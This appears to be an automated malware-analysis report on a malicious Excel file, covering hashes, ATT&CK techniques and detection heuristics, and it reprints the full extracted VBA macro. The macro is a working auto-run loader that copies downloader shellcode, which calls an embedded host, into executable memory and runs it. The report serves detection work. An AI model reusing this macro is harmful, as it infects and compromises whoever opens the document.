Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4a69b8e0390efb2d…

MALICIOUS

Office (OLE)

33.0 KB Created: 2018-06-12 18:45:11 Authoring application: Microsoft Excel First seen: 2019-08-04
MD5: 10aa65f1d1a366fb4592ef60fd0537d8 SHA-1: fce4210e90691483d56766492ceee3fb9da23515 SHA-256: 4a69b8e0390efb2dfbc900038e46f9ff4ea99a08c01cb8e5ff0ef1aa2c670293
126 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The file is an Excel document containing VBA macros, specifically triggering AutoOpen and Workbook_Open events, indicating an attempt to automatically execute malicious code upon opening. The presence of VirtualAlloc and CreateThread API calls suggests the macro is designed to allocate memory and create a new thread, likely to download and execute a second-stage payload. The ClamAV detection as 'Doc.Downloader.Generic' further supports this downloader functionality.

Heuristics 7

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Sub
Sub AutoOpen()
Auto_Open
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    End Sub
Sub Workbook_Open()
Auto_Open
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    #End If
Sub Auto_Open()
Dim lfoveadzop As Long, syobpebpitrlzpvfe As Variant, jzprwfvbukhau As Long
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5118 bytes
SHA-256: 7bd464a08eb74a5c7273a548d1cb90f4b16de67c8c24a8796f3e75fbc8c09489
Detection
ClamAV: No threats found
Obfuscation or payload: likely
27 of 53 identifiers look randomly generated (e.g. 'chztlpdpehzdyyzmhtmw') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "EstaPasta_de_trabalho"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Plan1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Const sjvguivntp = 2
Const kofbgyfmzl = 1
Const egnrtxhbyh = 0
#If VBA7 Then
Private Declare PtrSafe Function tzlmokwh Lib "kernel32" Alias "CreateThread" (ByVal pqnfrydcbbfkbu As Long, ByVal jueugoufjbg As Long, ByVal tnrfkknfmityn As LongPtr, wytcygrg As Long, ByVal zyamqhlb As Long, wqqalghx As Long) As LongPtr
Private Declare PtrSafe Function lkrhokgstxqrvrdnfu Lib "kernel32" Alias "VirtualAlloc" (ByVal chztlpdpehzdyyzmhtmw As Long, ByVal ltydhyusbauhajk As Long, ByVal yslnqpffieqttgfh As Long, ByVal xzlvastclfgccl As Long) As LongPtr
Private Declare PtrSafe Function nqjstddnbfhaobeqkh Lib "kernel32" Alias "RtlMoveMemory" (ByVal hqsnqoxhdbjiihvyb As LongPtr, ByRef lxqnatdeubepcdjm As Any, ByVal qtmatsrj As Long) As LongPtr
#Else
Private Declare Function tzlmokwh Lib "kernel32" Alias "CreateThread" (ByVal pqnfrydcbbfkbu As Long, ByVal jueugoufjbg As Long, ByVal tnrfkknfmityn As Long, wytcygrg As Long, ByVal zyamqhlb As Long, wqqalghx As Long) As Long
Private Declare Function lkrhokgstxqrvrdnfu Lib "kernel32" Alias "VirtualAlloc" (ByVal chztlpdpehzdyyzmhtmw As Long, ByVal ltydhyusbauhajk As Long, ByVal yslnqpffieqttgfh As Long, ByVal xzlvastclfgccl As Long) As Long
Private Declare Function nqjstddnbfhaobeqkh Lib "kernel32" Alias "RtlMoveMemory" (ByVal hqsnqoxhdbjiihvyb As Long, ByRef lxqnatdeubepcdjm As Any, ByVal qtmatsrj As Long) As Long
#End If
Sub Auto_Open()
Dim lfoveadzop As Long, syobpebpitrlzpvfe As Variant, jzprwfvbukhau As Long
#If VBA7 Then
Dim bnitoxsvwvcs As LongPtr, lrjgvnrkijvhxe As LongPtr
#Else
Dim bnitoxsvwvcs As Long, lrjgvnrkijvhxe As Long
#End If
syobpebpitrlzpvfe = Array(232, 130, egnrtxhbyh, 0, egnrtxhbyh, 96, 137, 229, 49, 192, 100, 139, 80, 48, 139, 82, 12, 139, 82, 20, 139, 114, 40, 15, 183, 74, 38, 49, 255, 172, 60, 97, 124, sjvguivntp, 44, 32, 193, 207, 13, kofbgyfmzl, 199, 226, 242, 82, 87, 139, 82, 16, 139, 74, 60, 139, 76, 17, 120, 227, 72, kofbgyfmzl, 209, 81, 139, 89, 32, kofbgyfmzl, 211, 139, 73, 24, 227, 58, 73, 139, 52, 139, kofbgyfmzl, 214, 49, 255, 172, 193, _
207, 13, kofbgyfmzl, 199, 56, 224, 117, 246, 3, 125, 248, 59, 125, 36, 117, 228, 88, 139, 88, 36, kofbgyfmzl, 211, 102, 139, 12, 75, 139, 88, 28, kofbgyfmzl, 211, 139, 4, 139, kofbgyfmzl, 208, 137, 68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, 95, 95, 90, 139, 18, 235, 141, 93, 104, 110, 101, 116, egnrtxhbyh, 104, 119, 105, 110, 105, 84, 104, 76, 119, 38, 7, 255, 213, 49, 219, 83, 83, 83, 83, _
83, 104, 58, 86, 121, 167, 255, 213, 83, 83, 106, 3, 83, 83, 104, 185, kofbgyfmzl, egnrtxhbyh, 0, 232, 199, egnrtxhbyh, 0, egnrtxhbyh, 47, 101, 112, 90, 116, 54, 75, 112, 78, 72, 86, 107, 69, 56, 81, 88, 119, 88, 57, 69, 88, 115, 65, 119, 54, 78, 84, 72, 116, 105, 72, 66, 51, 90, 77, 78, 108, 68, 106, 50, 97, 117, 65, 121, 52, 66, 106, 105, 119, 69, 88, 104, 115, 105, 79, egnrtxhbyh, _
80, 104, 87, 137, 159, 198, 255, 213, 137, 198, 83, 104, egnrtxhbyh, 50, 224, 132, 83, 83, 83, 87, 83, 86, 104, 235, 85, 46, 59, 255, 213, 150, 106, 10, 95, 104, 128, 51, egnrtxhbyh, 0, 137, 224, 106, 4, 80, 106, 31, 86, 104, 117, 70, 158, 134, 255, 213, 83, 83, 83, 83, 86, 104, 45, 6, 24, 123, 255, 213, 133, 192, 117, 20, 104, 136, 19, egnrtxhbyh, 0, 104, 68, 240, 53, 224, 255, _
213, 79, 117, 205, 232, 75, egnrtxhbyh, 0, egnrtxhbyh, 106, 64, 104, egnrtxhbyh, 16, egnrtxhbyh, 0, 104, egnrtxhbyh, 0, 64, egnrtxhbyh, 83, 104, 88, 164, 83, 229, 255, 213, 147, 83, 83, 137, 231, 87, 104, egnrtxhbyh, 32, egnrtxhbyh, 0, 83, 86, 104, 18, 150, 137, 226, 255, 213, 133, 192, 116, 207, 139, 7, kofbgyfmzl, 195, 133, 192, 117, 229, 88, 195, 95, 232, 107, 255, 255, 255, 49, 57, 50, 46, 49, 54, 56, 46, 49, 48, 48, _
46, 52, 56, egnrtxhbyh, 187, 240, 181, 162, 86, 106, egnrtxhbyh, 83, 255, 213)
bnitoxsvwvcs = lkrhokgstxqrvrdnfu(egnrtxhbyh, UBound(syobpebpitrlzpvfe), &H1000, &H40)
For jzprwfvbukhau = LBound(syobpebpitrlzpvfe) To UBound(syobpebpitrlzpvfe)
lfoveadzop = syobpebpitrlzpvfe(jzprwfvbukhau)
lrjgvnrkijvhxe = nqjstddnbfhaobeqkh(bnitoxsvwvcs + jzprwfvbukhau, lfoveadzop, kofbgyfmzl)
Next jzprwfvbukhau
lrjgvnrkijvhxe = tzlmokwh(egnrtxhbyh, egnrtxhbyh, bnitoxsvwvcs, egnrtxhbyh, 0, egnrtxhbyh)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Private Function dskaymqvwmki(ByVal kwiqswaezhbd As String) As String
Dim bapzlpgynsok As Long
For bapzlpgynsok = 1 To Len(kwiqswaezhbd) Step 2
dskaymqvwmki = dskaymqvwmki & Chr$(Val("&H" & Mid$(kwiqswaezhbd, bapzlpgynsok, 2)))
Next bapzlpgynsok
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.